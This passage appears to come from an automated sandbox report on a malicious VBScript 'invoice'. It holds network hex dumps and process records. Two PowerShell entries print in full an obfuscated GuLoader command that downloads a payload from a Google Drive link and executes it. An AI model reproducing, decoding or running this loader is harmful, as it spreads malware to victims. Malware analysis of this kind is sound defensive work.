                        Data Ascii: p.%QD=E`&{#Xg!h|GvF#t]=pkq{\Rs"'S.8}p(Xp+[(e%cmH-^:EAtsFi__P\U#8e>a3tDI E~9X<,M[x:rgkZhels|-H,)OS}
                        2024-09-30 07:58:23 UTC1390INData Raw: 0b 65 fe 95 91 3f a4 b1 45 a6 c9 bd 6a f6 f8 39 1c d4 5d cd 58 57 c9 43 41 52 24 3d bc ed da 70 4b d5 df 3b 0a a4 11 b5 46 73 63 2c e8 3b 47 38 11 3e 63 45 f3 81 63 e9 67 93 a7 e8 79 7b bb 29 5b 8c 33 92 b6 64 97 87 fa 88 46 cd 60 f7 81 82 06 85 0e 13 07 98 f9 a0 1b 79 63 de bd 44 a2 09 3d 14 5e 9a 02 12 3a a4 77 5a 02 89 3a 91 ac cf 14 db 71 bc 8d cc 8d 2b 94 d0 bd e0 3b 2b 6e 54 74 6d bc ca 6d 4c aa 77 64 c2 b8 df 3f 98 76 12 1f 89 a5 5a e3 cf 86 ca c6 e5 16 4c 3a d2 dd 10 a6 16 a4 35 49 3d f7 fa a1 8b 38 eb 75 bc 9f 20 63 1a 25 88 92 60 e7 96 5e 1f 4c c2 7d a1 34 1b 6b 48 a9 cf 74 e2 dd a8 b2 04 e5 2b e2 ea 1d e1 b8 a8 1f 4a b4 0f c5 e8 dc 94 7a 1b 90 b3 39 78 cc b8 d6 04 f7 e2 5e 7f 09 ab ef 07 4a 0a e4 20 83 7d 6f 91 65 ea 3a 33 5b ea 86 47 76 77 b2
                        Data Ascii: e?Ej9]XWCAR$=pK;Fsc,;G8>cEcgy{)[3dF`ycD=^:wZ:q+;+nTtmmLwd?vZL:5I=8u c%`^L}4kHt+Jz9x^J }oe:3[Gvw
                        2024-09-30 07:58:23 UTC1390INData Raw: 53 43 f6 62 cc a4 28 00 69 90 80 17 8f 9d ef 4d 20 f3 5f 61 c6 b4 4a 9a 00 29 7b c5 fd 8c 87 99 77 c5 b7 5c d5 1d 16 4c 5e bd 0c 1e 90 b5 44 5d f5 d9 c3 c2 16 5f f4 f8 f2 42 80 d8 d6 b8 86 76 16 5e 4d 63 8e f5 6c 17 57 c3 2f 64 52 37 e2 70 c5 f0 de 30 7a 4b a6 44 8a b9 7e c0 b1 1f f5 a8 a3 36 74 79 ea 64 6b 5f 58 62 66 8b 32 e6 22 04 48 49 2a f8 f1 76 0a 24 a6 95 e2 e0 df 31 fe 3e 37 4c d5 bd 53 9d cf 03 56 88 7a 43 26 a7 96 a5 63 49 9d a0 9c d0 22 30 3b 65 85 e6 7e 41 73 3f 8b c3 ac 4a cc bb 8b e5 49 65 dc ae e9 fc a0 42 a2 b9 04 13 43 ca ad 26 38 df 17 4d 52 46 56 f2 35 c7 56 3e 59 d4 9d b4 63 64 50 85 d9 16 7d 88 96 4b 47 b6 2b 17 bd af 50 0c f0 42 f7 03 5a 5a 1d dc 82 e0 1c 4a 1a ab 34 f8 98 5c 94 ea 6e 40 6d 24 4a c3 b6 02 4d b3 31 4b d1 d4 49 b0 7a
                        Data Ascii: SCb(iM _aJ){w\L^D]_Bv^MclW/dR7p0zKD~6tydk_Xbf2"HI*v$1>7LSVzC&cI"0;e~As?JIeBC&8MRFV5V>YcdP}KG+PBZZJ4\n@m$JM1KIz
                        2024-09-30 07:58:23 UTC1390INData Raw: 13 36 5d e3 23 48 3d 33 04 6e 13 78 b0 4c eb 1f cb 26 df d6 ff a5 19 81 9e 72 4f 26 e5 57 5e 87 01 0b 63 4c f2 17 27 0f 49 3e 6d ae 32 c6 59 c9 c9 d6 4c 58 22 2f 7c c1 7a 95 60 0b 04 71 f1 ff b1 65 f3 39 ce 3e 31 8e ab f6 0e 52 b3 59 b1 cb a7 d3 5f 30 9c 30 18 a9 fc 29 b6 02 36 4b 95 c4 b2 c7 be 48 c9 0f d1 7d 70 6d 94 a8 d6 79 5a f9 b9 63 49 be 7c 56 57 c6 90 b4 e7 45 9f 52 13 f5 4d d3 8d 09 3e 2b d1 f8 99 d8 fa 69 aa ca c2 e4 63 00 a1 d3 cf 91 75 20 da 1b 20 61 74 0a 1c 7f ce ee 63 83 fe 59 91 be 4a 73 8d ce f6 bc 1d c2 f7 26 ad ef df fe d1 31 dc 8b c4 58 89 64 b0 f1 fb 03 3b ea 13 22 64 8f 1a 3f 7a c8 77 c2 f7 de 38 58 78 7c 78 4a 8c db 94 a4 c7 11 56 d2 39 da 0d 3c d1 88 7f 5b 1b 68 29 8a a0 bc 44 a2 0d 68 34 c9 20 04 8f 20 a9 e1 7a e8 fa 9f 73 cc fc
                        Data Ascii: 6]#H=3nxL&rO&W^cL'I>m2YLX"/|z`qe9>1RY_00)6KH}pmyZcI|VWERM>+icu atcYJs&1Xd;"d?zw8Xx|xJV9<[h)Dh4 zs
                        2024-09-30 07:58:23 UTC1390INData Raw: 17 a6 bb 22 83 a7 39 34 3a 23 16 5d 50 e7 2f e9 f6 53 d1 a3 f2 ec e9 41 a8 b9 76 c4 61 24 c7 13 ef 72 9b 0a 82 4e 74 5b 93 04 c9 75 77 55 02 75 ec 09 69 74 b2 a5 ff d7 5a ee 05 f4 68 6e f8 49 00 2c 41 f2 80 b2 c1 dc d1 8a ca 8f fd 9e 44 83 b0 5b 76 a4 de 04 02 c2 65 82 e2 74 e0 1d db 93 d0 08 98 d7 35 e5 9f 4a 95 ae 11 7e cc 2b b3 57 65 25 39 7f 5a 19 8c 73 34 e1 05 27 80 df ce 5b 3d 46 47 40 27 20 26 c8 f9 01 53 0b 9d 08 5e d3 41 39 90 37 a7 97 30 de c4 e2 cc 95 6a 99 c1 e5 db 73 aa 79 d7 47 50 4f 60 17 58 b5 7b ee 3f 73 6b 10 2e 14 39 42 20 1e d4 7b ed 0d 60 1f f0 65 65 99 45 ce f7 09 1d 12 06 be e2 f0 61 48 d9 64 6a 36 22 f6 91 39 b3 88 ec 3e b5 1c 9a e3 de 78 7b 9a a4 2d b4 e0 64 82 35 5f 82 0a 1b c0 9b a3 ec e5 bf ad 1c 6e bf 8e 3c 68 bf 84 99 33 96
                        Data Ascii: "94:#]P/SAva$rNt[uwUuitZhnI,AD[vet5J~+We%9Zs4'[=FG@' &S^A970jsyGPO`X{?sk.9B {`eeEaHdj6"9>x{-d5_n<h3
                        2024-09-30 07:58:23 UTC1390INData Raw: e3 df 14 51 3f 4d 2d 4d 88 50 5a 68 47 ac 0a cf b3 df 85 cf 65 a8 06 4a 51 cd 23 36 34 d2 cb a8 33 96 e2 26 57 42 a4 dd c9 b1 21 cb 16 68 b5 bd 67 2e 31 82 36 e8 8a be 83 3e 36 91 ef 69 0e dd 65 bc 12 c1 73 21 93 d0 3f df 02 4e 0e df 5e 58 13 f5 c8 f8 df 14 fb ee a6 1c fb 80 dc 55 ba be b2 de 6e 4d 5a 80 e4 45 71 51 15 c4 d2 28 17 21 e3 f4 6b 4f d9 31 19 51 99 2d 33 0b c7 66 06 f6 2f ed 5a 93 a2 2f 89 5c f6 1c 58 82 b3 64 2b d5 f0 f9 18 39 18 c7 13 0b 22 7f b5 12 ee 29 7f 7d 84 ab f9 28 6f 57 ae 19 7f 76 c4 29 58 72 24 ed d0 75 fe 07 46 f3 01 7d b9 4e 2b 10 17 86 8c 87 9e e1 fe 79 da be cc f5 2c 8d 0a 92 ad 37 81 b0 b3 91 9d 81 3a 48 3f 36 ff 0b ef 8a b2 e9 57 12 4c fb 9a 36 19 f5 3e e5 5c b3 15 ec 80 00 11 22 8b a8 cb bb a0 35 a2 94 bf d5 e8 7b 4c fa ae
                        Data Ascii: Q?M-MPZhGeJQ#643&WB!hg.16>6ies!?N^XUnMZEqQ(!kO1Q-3f/Z/\Xd+9")}(oWv)Xr$uF}N+y,7:H?6WL6>\"5{L


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:03:57:25
                        Start date:30/09/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe"
                        Imagebase:0x7ff6e12c0000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:1
                        Start time:03:57:28
                        Start date:30/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
                        Imagebase:0x7ff788560000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2107886450.000001E577A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:03:57:28
                        Start date:30/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:03:57:46
                        Start date:30/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkfuTTub uyH vedpCamate ingb]Cah.a: Sygn:GruppTOverplLotuss.opel1Bande2 E is ');$Aphagia=$Krammende[0];$Stateful=(Kolonnetypernes 'Toast$Pan ogAllypL R.seo Ex rB isecA eklilElsew:TysklB rottJV.soiEIdemaRAntagGCarabtpartuO BlompPaca.P DisrEMatro=SvansNtabslEkikkewmet,o-KonsooHeliabNonrej Indbe EmplcPj,ketOpbyn AandeS itarYGlacksIner.TMesarEM xinMBron .besmyN KeraENeumaT ratr.Ann.lWMisdee omaBLrerfcAlbatlouts I omesENonpaNSwishTMylis ');Sibs ($Stateful);Sibs (Kolonnetypernes ' g nd$RumflBUnbl j Dyr,eAnt.nr Navsg UnextForuloUnliopWat apTrisoeLasur. Svr,HbargaeOffisaResc.d Dybde N,nprFald s oni[Illu $MyndiOTekstrS ngsiUnde,gDevasiKumysnElderaCrutclFinkifKum laCa arbCo tlrSp.kti EmpakP.rtikResbee winnIren ]Nonde=Pusle$ Fo sdAkrylyPertiiIrritnFossfgS edenFlu iePl.tes S,epsCodom ');$Raadighedssummer=Kolonnetypernes 'Efter$MaritBCoempjF ngeeProp rCockng fej.tGolasoRecidpNontep gud eUnder.MimidD Veneo SiggwBiblinT rmil,ngdooExpreaSa.medHyldeFMarcoiPa erlKoreoePremi( F.se$StratAStumppExcenhSnorkaUdgragKluntiAer.gaConcr,C,pro$FarveSPa eseForlomArmleiInde mRskena Ops,nFdde,aBrunegTortueudda rHyp xi RereaWi ghl,vesylJ nnyy Isop).onra ';$Semimanagerially=$Torsionsaffjedringen;Sibs (Kolonnetypernes 'In ri$Anem Gsto tl ImproOve cBTucktaPe roLN nan: PaasODauntPGen.ehHimmeTVictohBredda BetolFthmbMblgniE Ch mCF,rtrTNedklOKopiem sykry Dyst=Strai( T out verte nkeS DemiT H,en-SteriPOver a prosTSamarHSuper Resta$R humscompueFo,thmKlbe,IOvaspMUricoAReturnbacheALokalG encrEP.okaRIndstIAn,iaaSuperl timelMadmoyBeoen)Maal ');while (!$Ophthalmectomy) {Sibs (Kolonnetypernes 'Natha$Over g DraflCroydoTilnrbPla taSalvilK.mpa:lev eKCyto.o Om ng DamieSagomb ModegSowarehemi r af,unEgesteNona sKu ka=photo$ CryptstuderLiegeuSt.mme Vi d ') ;Sibs $Raadighedssummer;Sibs (Kolonnetypernes 'W ggpSTandgt IndtaUntoorStaa tMe,ne-Tra eSAf enl Lec eBj rre Grinp bbo Preau4Atla ');Sibs (Kolonnetypernes 'Leg l$kar,egTe nil M leoCorybb AccoaAccenlIliad: igesO Slutp m srhArmodtS milhtilbaasli slPostumKlaske Etagc ResutEquipoZemerm P lyySti,u=Baa d(ThingTRestbe ormsT stitLakfe-dreraPHoamia RugatImpleh Reli nond$AstraS Filie FchamAfsk iGennemAudibaM dstnSpurna oprig,aidbeK rstr MobiiSulfoaIglesl Ca alUnmecy nunn)Ansti ') ;Sibs (Kolonnetypernes 'T.mpe$ eenag fbrilLreb o FrerbUnpreaUn erlOrch :KrumnSMononlSolskaOntargCantobSav.eoCy lorTormeeTamertRememssuege=Elekt$Sagtmgsner.lWandeoScenabMat iaflasklutnke:TonsiCIndu.oOcclunprinstPyrroidecimnVitaleVoksenSy thcCynice Ports Spa +Schis+Milke%fistl$Su.exK GenbrUm liaele.tmS,orsm l ndeSyns nB siadSvbele Mort.MiliecelevaoAntecukursinDhanut Leio ') ;$Aphagia=$Krammende[$Slagborets];}$vicarious=280081;$Mellemskolerne=30680;Sibs (Kolonnetypernes 'Smoke$Repu.gBem,rlEzau oBlt sbTa taaOv.rhlGodtf:BozosSVenskt owborAlp rkPotsheM chis edirtSussi1 vent5Quint1Brick Isidi=Brudg Bl,elGMellee Dortt ater-Udl,gC FremoLamsen Adjotdw,rfeSkrignfr,trtFikse Tabe$ Co oSFibereFotoemsi kaiSp jlmRo eiaOpsern Afv aAendegKa ere m nirPavediExol aTertulConselPolycyLreru ');Sibs (Kolonnetypernes 'Swer $FortsgKu lslCountocent bWeakmaSaul lTrimo:FilthCSculpodoradtKursfoMondarE oretAndenuR adgrSupereAflev Hall = T dd Mave[OkkerSgale.y Venns PenptSuperePluramRhodo.SmalfCEgoiso,ristnAbentvCatcaeTyranrIn set yth]Datam:sunkk:BdlerFSyerorSurfpo .linmMledeBnonsyaCu itsBrog ep nke6Do be4FirdoSNoncotalkohrApperiT ishnElsbogSemim(Strid$UrtexSToorotEarthr OttekmetereEnde,s V,dlt Lnta1 Data5stvko1Intol)Baldo ');Sibs (Kolonnetypernes '.eslu$ OvergJord.lAfr.toD,misbDren aV ltelPeris:HidfrS heacaWosomgEmpirsTe taasili kSabeltmoral2Diskf0Forni4Zonur Tosts=Vestu Outga[faldsSdybdey SexosSt tut UdvaeAssasm ,orb.D gvaTMaadeeColorxUnpagtErena. LedeESoc onSaliacSkoeno.aquedInappiLage,nIsolagSoign]Fris :Clot :Sm,otAMicroSThripCdemogIKit eIGtepa.GradsGLyrice ,upetlok.lSStikltBillerP uraispachnFeedsgBrode(Land.$ Ind CbruneoJord,t RegnoNourirDemobtThermuKapitrFrdigeMyr e)Slubb ');Sibs (Kolonnetypernes ' Viri$OscesgHayfolFrem.oStalibB,okeaEss,glHorog:AnsalU Saltn SopstIndreeSp.ricPieplh.verpnV,veriUdenrcFolkea udlolAntieiHyperz storeTranss Herc= Ranc$PrimaSMarkraNonpogDemims Sum.aRotifkGummit tude2 tair0Semip4Ophth.Ni inspolypuSiloebKindbs pa ptHyp rrgenh iPret,nStedmgUnpic( alor$Ly egv SkriiSo brcBenmeaau osrExtraiCicatoUnderuJobsgsLeuco, Turb$AccelMIldpre Rustl D,trl umbeGenbrmYapoksBrystk soenoPaastl ktioe andur nonenGrafie ,fhe)Vapor ');Sibs $Untechnicalizes;"
                        Imagebase:0x750000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2494284509.00000000085E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2481228299.0000000005A0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2494560682.0000000008EC2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:03:57:46
                        Start date:30/09/2024
